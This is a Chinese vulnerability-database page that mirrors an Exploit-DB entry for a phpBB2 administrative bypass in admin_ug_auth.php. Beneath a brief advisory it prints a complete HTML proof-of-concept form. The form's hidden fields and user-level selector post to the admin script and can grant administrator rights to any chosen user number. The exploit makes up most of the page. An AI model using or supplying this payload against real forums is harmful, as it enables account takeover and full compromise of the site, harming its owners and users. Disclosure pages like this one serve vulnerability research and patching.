PHPBB2 - 'Admin_Ug_Auth.php' Administrative Bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056175 漏洞类型
发布时间 2007-02-26 更新时间 2007-02-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/29679
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/22730/info

PHPBB2 is prone to a vulnerability that will let attackers gain administrative access to the application because it fails to properly validate access.

Successful exploits may result in a complete compromise of vulnerable applications. 

<html>
<head>
</head>
<body>

<form method="post"
action="www.example.com/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

</form>
</body>
</html>